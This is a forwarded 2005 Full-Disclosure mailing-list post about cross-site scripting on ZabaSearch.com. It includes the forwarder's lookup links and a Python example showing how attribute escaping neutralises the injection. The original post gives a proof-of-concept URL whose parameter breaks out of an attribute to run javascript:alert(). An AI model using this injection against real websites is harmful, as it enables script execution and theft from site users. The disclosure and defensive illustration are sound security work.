
Fwd: [Full-disclosure] ZabaSearch.com XSS



ZABA happens to be my initials, but I have nothing to do with
zabasearch.com.
I Googled related sites:
http://www.google.com/search?hl=en&ned=us&q=inurl%3Azabasearch&btnmeta%3Dsearch%3Dsearch=Search+the+Web

Snopes' latest finding on the site:
http://www.snopes.com/computer/internet/zabasearch.asp
then clicked down to:
http://www.wired.com/news/privacy/0,1848,67407,00.html
<snip>
Wired News sat down with Robert Zakari, ZabaSearch president and general 
counsel, and chairman Nicholas Matzorkis, to talk about ZabaSearch
<snip>
They've been up since April-05?
http://uptime.netcraft.net/up/graph?mode_u=on&site=ZabaSearch.com&mode_w=off&avg_days=360&submit=Redisplay+Graph

Now on Zaba, Inc. 135 N. Los Robles Ave. Suite 850 Pasadena CA US 91101 :
http://uptime.netcraft.net/up/hosted?netname=INAP-HOU-ZABA-2018,216.52.81.192,216.52.81.255
Tested on R. Scott Perry's dnsreport.com:
http://www.dnsreport.com/tools/dnsreport.ch?domain=ZabaSearch.com
Also avail, RSP's dnsstuff.com, netmechanic, visualware, ...

ZABA
PS:
You may also exhaustively check out your own sites, online ebanking and 
other URLs of interest.
---------- Forwarded message ----------
From: bitlance winter <bitlance_3@xxxxxxxxxxx>
Date: May 16, 2005 1:06 PM
Subject: [Full-disclosure] ZabaSearch.com XSS
To: Full-Disclosure@xxxxxxxxxxxxxxxxx

Hello.

ZabaSearch.com XSS 8-(
Unbelievable.

Please Input your Credit Card Number...

http://www.zabasearch.com/find_anyone_form_t.php?first=f"style=
background-image:url(javascript:alert());"

See also:
http://www.wired.com/news/privacy/0,1848,67407,00.html 
02:00 AM May. 06, 2005 PT

bitlance winter


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
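
An added example, not part of the original posts: the `first` value from the URL above contains a double quote, so a page that copies it into a quoted attribute unencoded lets it close the attribute and add a `style` attribute of its own. The sketch below renders that value both ways and parses the result to show which attributes the tag ends up with. The `<input>` markup and all function names are assumptions for illustration; the site's real template is not shown in the post.

```python
from html import escape
from html.parser import HTMLParser

# Value of the `first` parameter from the URL in the post (line wrap removed).
PAYLOAD = 'f"style=background-image:url(javascript:alert());"'

def render_unescaped(first):
    # Assumed vulnerable pattern: parameter copied into a quoted attribute as-is.
    return '<input type="text" name="first" value="%s">' % first

def render_escaped(first):
    # Attribute-context encoding: &, <, >, " and ' are emitted as entities.
    return '<input type="text" name="first" value="%s">' % escape(first, quote=True)

class InputAttrs(HTMLParser):
    """Collects the attributes the parser sees on the first <input> tag."""
    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)

def parsed_attrs(markup):
    parser = InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs

def injected_attributes(markup, expected=("type", "name", "value")):
    # Attributes present on the tag that the template never intended to emit.
    return sorted(set(parsed_attrs(markup)) - set(expected))

if __name__ == "__main__":
    for render in (render_unescaped, render_escaped):
        markup = render(PAYLOAD)
        print(render.__name__, "->", injected_attributes(markup),
              "value =", repr(parsed_attrs(markup)["value"]))
```

The same parse-and-compare check works as a regression test for any template that reflects request parameters into attributes.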